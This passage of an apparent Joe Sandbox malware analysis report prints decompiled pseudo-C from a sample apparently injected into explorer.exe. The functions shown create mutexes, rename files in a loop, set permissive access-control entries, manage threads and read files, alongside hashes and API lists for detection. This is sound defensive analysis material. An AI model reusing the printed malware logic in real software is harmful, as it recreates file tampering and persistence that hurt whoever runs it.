						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}






                  0x0008a47d
                  0x0008a485
                  0x0008a489
                  0x0008a4a0
                  0x0008a4af
                  0x0008a4b5
                  0x0008a4b8
                  0x0008a4b8
                  0x00000000
                  0x0008a4ba
                  0x0008a48b
                  0x00000000

                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
                  • GetLastError.KERNEL32 ref: 0008A48B
                  • GetLastError.KERNEL32 ref: 0008A495
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ErrorLast$CreateMutex
                  • String ID:
                  • API String ID: 200418032-0
                  • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                  • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
                  • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                  • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00086DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00086DA0(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0x9e778; // 0x40fc08
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E00089ED0(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0x9e78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0x9e688; // 0xb0000
						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
						 *0x9e78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0x9e688; // 0xb0000
					_push(L"\\c");
					_t9 = E000892E5(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0x9e688; // 0xb0000
							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E0008B269(_t59) == 0) {
								_t32 = E0008F14F(_t59, 0x1388, _t74);
							}
							E0008A4DB(_t56);
							_t41 =  *0x9e684; // 0x40f8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E0008980C( &_v544);
								_t43 =  *0x9e778; // 0x40fc08
								_t53 = 0x33;
								if(E00089ED0(_t43, _t53) != 0) {
									L12:
									__eflags = E00081C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E0008B1B1(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0x9e778; // 0x40fc08
									_t53 = 0x12;
									_t22 = E00089ED0(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
										_push(E0008980C(0));
										E00089640( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E0008861A( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}
























                  0x00086da0
                  0x00086da6
                  0x00086dac
                  0x00086db9
                  0x00086dba
                  0x00086dbb
                  0x00086dc2
                  0x00086dc8
                  0x00086dcd
                  0x00086dcf
                  0x00086dd1
                  0x00086ddd
                  0x00086de2
                  0x00086de2
                  0x00086de7
                  0x00086de9
                  0x00086dea
                  0x00086df4
                  0x00086dfa
                  0x00086dff
                  0x00086e01
                  0x00086e04
                  0x00086e0a
                  0x00086e10
                  0x00086e10
                  0x00086e26
                  0x00086e2a
                  0x00000000
                  0x00000000
                  0x00086e39
                  0x00086e42
                  0x00086e42
                  0x00086e46
                  0x00086e4b
                  0x00086e52
                  0x00086e57
                  0x00086e5d
                  0x00086e62
                  0x00086e6a
                  0x00086e72
                  0x00086ec0
                  0x00086ec7
                  0x00086ec9
                  0x00086ecd
                  0x00000000
                  0x00086ecd
                  0x00086e74
                  0x00086e74
                  0x00086e7c
                  0x00086e7d
                  0x00086e82
                  0x00086e84
                  0x00086e96
                  0x00086ea7
                  0x00086eac
                  0x00086eb5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00086e84
                  0x00086e72
                  0x00000000
                  0x00086e57
                  0x00086ede
                  0x00086ee4
                  0x00086e0a
                  0x00086eeb

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FileMove
                  • String ID: %s.%u
                  • API String ID: 3562171763-1288070821
                  • Opcode ID: 18816e49f38be429948ef6d3383d30e391c2da75528b0b403aeef7b17627c66c
                  • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
                  • Opcode Fuzzy Hash: 18816e49f38be429948ef6d3383d30e391c2da75528b0b403aeef7b17627c66c
                  • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00082AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E00082AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0x9e710 * 0x64;
				_t39 = 0;
				_v12 =  *0x9e710 * 0x64;
				_t16 = E00088604(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0x9e710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E00089F48(0xe); // executed
						E0008861A( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0x9e714; // 0x12d0960
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0x9e714; // 0x12d0960
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0x9e710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}
















                  0x00082af0
                  0x00082afa
                  0x00082afd
                  0x00082b00
                  0x00082b05
                  0x00082b07
                  0x00082b0d
                  0x00082b17
                  0x00082b1d
                  0x00082b1f
                  0x00082b24
                  0x00082b81
                  0x00082b87
                  0x00082b8b
                  0x00082b96
                  0x00000000
                  0x00082b9d
                  0x00082b26
                  0x00082b28
                  0x00082b28
                  0x00082b31
                  0x00082b35
                  0x00082b3d
                  0x00082b43
                  0x00082b43
                  0x00082b44
                  0x00082b49
                  0x00082b4d
                  0x00082b63
                  0x00082b68
                  0x00082b6e
                  0x00082b71
                  0x00082b74
                  0x00082b74
                  0x00082b76
                  0x00082b77
                  0x00082b7a
                  0x00082b7d
                  0x00000000
                  0x00082b28
                  0x00000000

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeaplstrcat
                  • String ID: %u;%u;%u
                  • API String ID: 3011335133-2973439046
                  • Opcode ID: 7a3fd77245582d844e0d8f1f61c7398da9a49d0849e7c8a4a8e8fb0d67d6490a
                  • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
                  • Opcode Fuzzy Hash: 7a3fd77245582d844e0d8f1f61c7398da9a49d0849e7c8a4a8e8fb0d67d6490a
                  • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008BD10, Relevance: 3.1, APIs: 2, Instructions: 149memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 59%
                  			E0008BD10() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0x9e68c; // 0x40fab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0x9e68c; // 0x40fab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0x9e68c; // 0x40fab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0x9e684; // 0x40f8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0x9e684; // 0x40f8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0x9e688; // 0xb0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0x9e68c; // 0x40fab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0x9e68c; // 0x40fab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0x9e68c; // 0x40fab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0x9e68c; // 0x40fab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0x9e68c; // 0x40fab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0x9e68c; // 0x40fab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}






































                  0x0008bd1b
                  0x0008bd1e
                  0x0008bd26
                  0x0008bd2c
                  0x0008bd2f
                  0x0008bd34
                  0x0008bd3a
                  0x0008bd3b
                  0x0008bd3c
                  0x0008bd3d
                  0x0008bd3e
                  0x0008bd3f
                  0x0008bd40
                  0x0008bd41
                  0x0008bd44
                  0x0008bd47
                  0x0008bd49
                  0x0008bd4c
                  0x0008bd50
                  0x0008bd53
                  0x0008bd54
                  0x0008bd59
                  0x0008bd60
                  0x0008be54
                  0x0008be58
                  0x0008be5a
                  0x0008be62
                  0x0008be62
                  0x0008be69
                  0x0008be6b
                  0x0008be73
                  0x0008be73
                  0x0008be78
                  0x0008be7a
                  0x0008be80
                  0x0008be80
                  0x0008be87
                  0x0008be89
                  0x0008be91
                  0x0008be91
                  0x0008be95
                  0x0008be9a
                  0x0008be9a
                  0x0008bd6b
                  0x0008bd6e
                  0x0008bd75
                  0x0008bd76
                  0x0008bd7d
                  0x0008bd80
                  0x0008bd87
                  0x0008bd8a
                  0x0008bd95
                  0x0008bda0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008bda2
                  0x0008bda2
                  0x0008bda5
                  0x0008bda6
                  0x0008bda7
                  0x0008bda8
                  0x0008bda9
                  0x0008bdaa
                  0x0008bdab
                  0x0008bdac
                  0x0008bdae
                  0x0008bdaf
                  0x0008bdb3
                  0x0008bdb4
                  0x0008bdbe
                  0x00000000
                  0x0008bdc4
                  0x0008bdc4
                  0x0008bdc9
                  0x0008bdcb
                  0x0008bdcd
                  0x0008bdce
                  0x0008bdd5
                  0x0008bdd8
                  0x0008bddf
                  0x0008bde2
                  0x0008bde5
                  0x0008bde5
                  0x0008bde8
                  0x0008bdeb
                  0x0008bdec
                  0x0008bdf0
                  0x0008bdf1
                  0x0008bdf6
                  0x0008bdfc
                  0x00000000
                  0x00000000
                  0x0008be08
                  0x0008be0c
                  0x00000000
                  0x00000000
                  0x0008be0e
                  0x0008be14
                  0x0008be16
                  0x0008be1f
                  0x00000000
                  0x00000000
                  0x0008be21
                  0x0008be26
                  0x0008be27
                  0x0008be2a
                  0x0008be2c
                  0x0008be35
                  0x00000000
                  0x00000000
                  0x0008be3a
                  0x0008be3c
                  0x0008be44
                  0x0008be44
                  0x0008be47
                  0x0008be4f
                  0x00000000
                  0x0008be4f
                  0x0008bdbe

                  APIs
                  • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocEntriesLocal
                  • String ID:
                  • API String ID: 2146116654-0
                  • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                  • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
                  • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                  • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000898EE, Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0x9e76c; // 0x1dc
				_t73 = 0;
				if(E0008A4BF(_t77, 0x7530) >= 0) {
					_t45 =  *0x9e770; // 0x4095a0
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0x9e770; // 0x4095a0
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0x9e770; // 0x4095a0
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0x9e770; // 0x4095a0
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E0008A471(0, 1);
									_t82 =  *0x9e770; // 0x4095a0
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0x9e770; // 0x4095a0
									_t30 = _t83 + _t113 + 4; // 0x4095a4
									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
									_t53 =  *0x9e770; // 0x4095a0
									 *(_t113 + _t53) = _t52;
									_t54 =  *0x9e770; // 0x4095a0
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0x9e770; // 0x4095a0
										 *0x9e774 =  *0x9e774 + 1;
										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0x9e770; // 0x4095a0
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0x9e684; // 0x40f8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0x9e770; // 0x4095a0
										_t37 = _t61 + 0xc; // 0x4095ac
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0x9e770; // 0x4095a0
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0x9e76c; // 0x1dc
									E0008A4DB(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E00088604(_t110);
								_t97 =  *0x9e770; // 0x4095a0
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0x9e770; // 0x4095a0
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0x9e770; // 0x4095a0
								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0x9e684; // 0x40f8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0x9e770; // 0x4095a0
							goto L7;
						}
						_t98 =  *0x9e770; // 0x4095a0
						E0008984A(_t106 + _t98, 0);
						_t45 =  *0x9e770; // 0x4095a0
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}





































                  0x000898f1
                  0x000898f2
                  0x000898f3
                  0x000898fb
                  0x000898fe
                  0x00089905
                  0x0008990e
                  0x00089917
                  0x0008991e
                  0x00089920
                  0x00089922
                  0x00089922
                  0x00089927
                  0x0008994f
                  0x00089952
                  0x0008996c
                  0x00089972
                  0x000899b2
                  0x000899b6
                  0x000899bb
                  0x000899bf
                  0x000899bf
                  0x000899cb
                  0x000899cf
                  0x000899d7
                  0x000899dd
                  0x000899e2
                  0x000899e8
                  0x000899ec
                  0x000899f4
                  0x00089a06
                  0x00089a0b
                  0x00089a10
                  0x00089a13
                  0x00089a18
                  0x00089a1d
                  0x00089a59
                  0x00089a5f
                  0x00089a65
                  0x00089a6f
                  0x00089a74
                  0x00089a7a
                  0x00089a1f
                  0x00089a23
                  0x00089a28
                  0x00089a2b
                  0x00089a30
                  0x00089a33
                  0x00089a37
                  0x00089a3e
                  0x00089a43
                  0x00089a49
                  0x00089a51
                  0x00089a52
                  0x00089a52
                  0x00089a7c
                  0x00089a7c
                  0x00089a82
                  0x00089a88
                  0x00089a8b
                  0x00089a8d
                  0x00089a8d
                  0x00089974
                  0x00089978
                  0x0008997e
                  0x00089984
                  0x00089988
                  0x00089991
                  0x00000000
                  0x00000000
                  0x00089997
                  0x0008999b
                  0x000899a8
                  0x000899ad
                  0x00000000
                  0x000899ad
                  0x00000000
                  0x00089952
                  0x00089929
                  0x0008992e
                  0x0008992f
                  0x00089938
                  0x00089965
                  0x00000000
                  0x00089965
                  0x0008993a
                  0x00089945
                  0x0008994a
                  0x00000000
                  0x00089954
                  0x00089954
                  0x00089957
                  0x00089958
                  0x00000000
                  0x00089960
                  0x00089910
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d85dcc44abdee5eb962f219b78c68e4bab4d13c627165069f4ee2b0541897e29
                  • Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
                  • Opcode Fuzzy Hash: d85dcc44abdee5eb962f219b78c68e4bab4d13c627165069f4ee2b0541897e29
                  • Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A6A9, Relevance: 3.1, APIs: 2, Instructions: 90fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 27%
                  			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t34;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0008A63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x9e684; // 0x40f8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0x9e684; // 0x40f8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E0008861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t34 = E00088604(_t4); // executed
					_t60 = _t34;
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}














                  0x0008a6ac
                  0x0008a6ad
                  0x0008a6ae
                  0x0008a6b2
                  0x0008a6b4
                  0x0008a6b9
                  0x0008a6c9
                  0x0008a6cd
                  0x0008a757
                  0x0008a757
                  0x0008a759
                  0x0008a75b
                  0x0008a75d
                  0x0008a75d
                  0x0008a6d3
                  0x0008a6e1
                  0x0008a6e5
                  0x0008a73d
                  0x0008a73d
                  0x0008a743
                  0x0008a748
                  0x0008a750
                  0x0008a756
                  0x00000000
                  0x0008a748
                  0x0008a6e7
                  0x0008a6eb
                  0x0008a6f0
                  0x0008a6f2
                  0x0008a6f8
                  0x00000000
                  0x00000000
                  0x0008a6fc
                  0x0008a6ff
                  0x0008a700
                  0x0008a706
                  0x0008a707
                  0x0008a708
                  0x0008a72d
                  0x0008a70f
                  0x0008a761
                  0x00000000
                  0x00000000
                  0x0008a763
                  0x0008a766
                  0x0008a76c
                  0x0008a76e
                  0x0008a76e
                  0x0008a776
                  0x0008a779
                  0x00000000
                  0x0008a779
                  0x0008a717
                  0x0008a71a
                  0x0008a71e
                  0x0008a720
                  0x0008a723
                  0x0008a728
                  0x0008a72c
                  0x0008a72c
                  0x00000000
                  0x0008a72d
                  0x0008a6bb
                  0x00000000

                  APIs
                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                  • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,0040FD20,00000400), ref: 0008A776
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseFileHandleRead
                  • String ID:
                  • API String ID: 2331702139-0
                  • Opcode ID: 701268faecb08c7e662e07772a1ad47cf862077a9b2ff723ed93e566bb39f527
                  • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
                  • Opcode Fuzzy Hash: 701268faecb08c7e662e07772a1ad47cf862077a9b2ff723ed93e566bb39f527
                  • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008153B, Relevance: 3.1, APIs: 2, Instructions: 69synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 76%
                  			E0008153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0x9e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0x9e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E00081080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0x9e6e8 = E000891A6(_t3, 0);
							E000885C2( &_v8);
							_t7 = E00088604(0x100);
							 *0x9e6f0 = _t7;
							if(_t7 != 0) {
								 *0x9e6fc = 0;
								_t9 = E00088604(0x401);
								 *0x9e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0x9e6c0; // 0x0
									if(__eflags == 0) {
										E000915B6(0x88202, 0x8820b);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E0008E1BC(0x9bd28, _t24); // executed
